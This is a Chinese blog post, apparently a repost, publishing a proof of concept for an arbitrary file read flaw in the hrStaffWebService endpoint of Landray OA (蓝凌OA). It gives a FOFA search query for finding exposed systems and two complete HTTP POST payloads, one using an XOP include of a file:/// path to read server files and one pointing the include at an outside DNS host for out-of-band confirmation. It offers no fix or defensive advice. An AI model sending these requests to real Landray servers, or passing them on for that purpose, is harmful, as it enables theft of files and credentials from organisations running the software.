首页 > 其他分享 >蓝凌OA /sys/webservice/hrStaffWebService存在任意文件读取漏洞

蓝凌OA /sys/webservice/hrStaffWebService存在任意文件读取漏洞

时间:2024-11-07 10:19:17浏览次数:1  
标签:sys hrStaffWebService webservice j0ofrwsv2dtllbzzkyh9 OA Content ------

蓝凌OA /sys/webservice/hrStaffWebService接口处存在任意文件读取漏洞

FOFA

app="Landray-OA系统"

POC

  • 文件读取
POST /sys/webservice/hrStaffWebService HTTP/1.1
Host: 
Content-Type: multipart/related; boundary=----j0ofrwsv2dtllbzzkyh9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Content-Length: 619
Connection: close

------j0ofrwsv2dtllbzzkyh9
Content-Disposition: form-data; name="1"

<soapenv:Envelope xmlns:soapenv="" xmlns:web="http://webservice.staff.hr.kmss.landray.com/">
<soapenv:Header>
<soapenv:Body>
    <web:getHrStaffElements>
        <arg0>
            <beginTimeStamp>1</beginTimeStamp>
            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///"></xop:Include></count>
        </arg0>
    </web:getHrStaffElements>
</soapenv:Body>
</soapenv:Header>
</soapenv:Envelope>
------j0ofrwsv2dtllbzzkyh9--
  • DNS带外
    因为这个漏洞第一眼就觉得是XXE漏洞,然后就测试了下XXE的DNS带外的方式。
POST /sys/webservice/hrStaffWebService HTTP/1.1
Host: 
Content-Type: multipart/related; boundary=----j0ofrwsv2dtllbzzkyh9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Content-Length: 598
Connection: close
SOAPAction: ""

------j0ofrwsv2dtllbzzkyh9
Content-Disposition: form-data; name="1"

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.staff.hr.kmss.landray.com/">
<soapenv:Header>
<soapenv:Body>
    <web:getHrStaffElements>
        <arg0>
            <beginTimeStamp>1</beginTimeStamp>
            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="http://dns网址"></xop:Include></count>
        </arg0>
    </web:getHrStaffElements>
</soapenv:Body>
</soapenv:Header>
</soapenv:Envelope>
------j0ofrwsv2dtllbzzkyh9--

标签:sys,hrStaffWebService,webservice,j0ofrwsv2dtllbzzkyh9,OA,Content,------
From: https://www.cnblogs.com/lovesaber157/p/18531651

相关文章

  • oasys系统代码审计
    简述:oasys是一个OA办公自动化系统,使用Maven进行项目管理,基于springboot框架开发的项目,mysql底层数据库,前端采用freemarker模板引擎,Bootstrap作为前端UI框架,集成了jpa、mybatis等框架。下载地址:https://github.com/misstt123/oasys此项目部署极为简单,我使用的是phpstudy的5.7版......
  • web前端实现地址选择器精确到省市区街道(腾讯地图WebService API)
    目录先看效果,这里以移动端为例一、省市区街道选择器弹窗组件代码二、父组件引用“一”组件三、pc端效果总结先看效果,这里以移动端为例pc端稍微改下标签名和样式即可使用。一、省市区街道选择器弹窗组件代码html<template> <viewclass="page-content":styl......
  • 【鉴权】OAuth 2.0: 高度灵活与安全的身份认证框架
    目录引言一、OAuth2.0的核心概念1.1资源拥有者(ResourceOwner)1.2客户端(Client)1.3授权服务器(AuthorizationServer)1.4资源服务器(ResourceServer)1.5OAuth2.0体系架构图二、OAuth2.0授权流程2.1OAuth2.0授权流程概述2.2常见的授权模式2.2.1授权码模式(Autho......
  • 【鉴权】深入理解 OAuth 2.0 授权流程
    目录引言OAuth2.0授权流程概览1.用户访问客户端应用2.客户端请求授权码3.授权服务器展示授权页面4.用户同意授权5.客户端使用授权码换取访问令牌6.授权服务器返回访问令牌7.客户端使用令牌访问资源8.资源服务器返回受保护资源9.客户端展示数据10.访问令牌过......
  • Roaring Bitmap
    RoaringBitmap 原理RoaringBitmaps就是一种压缩位图索引,后文统称RBM,RBM的用途和Bitmap很差不多(比如说索引),只是说从性能、空间利用率各方面更优秀了。RBM的主要思想并不复杂,简单来讲,有如下三条:我们将32-bit的范围([0,n))划分为2^16个桶,每一个桶有一个Contai......
  • ThingsBoard规则链节点:Message Count 节点详解
    引言1.MessageCount节点简介2.节点配置2.1基本配置示例3.使用场景3.1监控设备活跃度3.2检测异常情况3.3生成统计报告4.实际项目中的应用4.1项目背景4.2项目需求4.3实现步骤5.总结 ......
  • [RoarCTF 2019]Easy Calc
    题目链接:https://buuoj.cn/challenges#[RoarCTF2019]EasyCalc打开环境后如下所示。查看该页面的源代码,发现存在"calc.php"文件,同时,提示设置了WAF。访问"calc.php"文件,发现该页面打印出了PHP源码。即。<?phperror_reporting(0);if(!isset($_GET['num'])){s......
  • [ACTF2020 新生赛]Upload
    题目链接:https://buuoj.cn/challenges#[ACTF2020新生赛]Upload打开环境后如下所示。指向灯泡,可以发现存在一个上传功能。尝试先上传".php"后缀文件,响应包如下。题目提示"nonono~Badfile!",此处笔者直接修改后缀为".phtml"后,发现可以成功上传,并且网页告知了上传的文件......
  • [极客大挑战 2019]Upload
    题目链接:https://buuoj.cn/challenges#[极客大挑战2019]Upload。打开环境,如下所示。通过页面源代码可以发现,该网站系PHP架构,因此尝试直接上传一句话木马。发现提示"NOT!php!",因此尝试fuzzing一下后缀名。发现网站可以通过了"phtml"的后缀名,但是提示文件内容存在字符......
  • 深度学习(tensorboard使用)
    在做深度学习的时候,尤其是在没有界面的服务器上训练时,可以利用tensorboard工具输出各种曲线或中间图像。下面代码将曲线和图像输出到run目录下临时文件中。fromtensorboardXimportSummaryWriterfromPILimportImageimportnumpyasnpimporttorchvisionimporttorch......